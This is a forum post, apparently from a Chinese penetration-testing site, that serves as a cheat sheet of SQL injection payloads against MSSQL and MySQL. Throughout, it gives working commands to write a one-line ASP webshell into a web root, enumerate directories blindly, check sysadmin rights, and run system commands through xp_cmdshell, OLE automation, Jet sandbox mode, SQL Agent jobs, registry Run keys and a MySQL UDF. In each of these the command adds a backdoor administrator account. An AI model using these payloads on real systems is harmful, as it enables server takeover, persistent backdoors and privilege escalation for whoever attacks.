China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: Useful MSSQL commands and exporting a one-line webshell

Author: admin    Time: 2012-9-13 17:49
Exporting a one-line webshell (一句话木马) with MSSQL statements
First determine the website's web root path.

;create table pcguest(pc char(255));-- //create a table to hold the one-line shell

;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- //insert the URL-encoded one-line shell into the table

;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- //write the table contents out as an ASP file. sp_makewebtask is a SQL Server 2000-era Web Assistant procedure that requires sysadmin and was removed from later versions.
Listing directories with MSSQL

;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //create a new table (three columns, because xp_dirtree with a third argument of 1 also returns files)

Insert pctest exec master..xp_dirtree 'd:\app\',1,1 //load the xp_dirtree listing into the table just created

and (select Count(1) from [pctest]) between 0 and 99 //the row count tells you how many files and subdirectories there are

And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //guess the length of the second entry

And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //guess each character of the entry one at a time
Checking the database version and privileges
and 1=(select @@VERSION) //returns the detailed version string (through the conversion error)
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //check whether the login is sysadmin (sa-level)
and 1=(SELECT IS_MEMBER('db_owner'));-- //check whether the user is db_owner
1. Executing commands with xp_cmdshell
exec master..xp_cmdshell 'net user rfire 123456 /add'
exec master..xp_cmdshell 'net localgroup administrators rfire /add'

Restoring the xp_cmdshell extended stored procedure
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2. Executing commands with SP_OAcreate and SP_OAMETHOD
Used when the wscript.shell component exists but both xp_cmdshell and xplog70.dll have been removed.
DECLARE @shell INT //declare a variable to hold the object handle
EXEC SP_OAcreate 'wscript.shell',@shell out //create an instance of the OLE object
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //call the run method on that instance

3. Using Jet sandbox mode
First use xp_regwrite (this requires xp_regwrite to be present) to change the registry, then use OpenRowSet to open an .mdb file that ships with the system and execute SQL through it.
Enable sandbox mode:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0

Execute a command:
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');

4. Executing commands through SQL Server Agent
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //start the SQLSERVERAGENT service with xp_servicecontrol

Execute a command:
use msdb exec sp_delete_job null,'x' //switch to msdb and delete job x first so a leftover job does not cause an error
exec sp_add_job 'x'
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //add a CmdExec job step
exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x' //bind the job to this server and start it
5. Executing commands via a registry Run key (xp_regwrite writes the command into a startup entry)
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell','REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'

6. Command execution in MySQL
MySQL UDF (user-defined function) privilege escalation (the account needs insert and delete privileges)
First export c:\windows\udf.dll through su.php
After exporting it, create the user-defined function:
Create Function cmdshell returns string soname 'udf.dll'
Execute a command
select cmdshell('net user rfire 123456 /add')
Drop the function afterwards: drop function cmdshell




Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2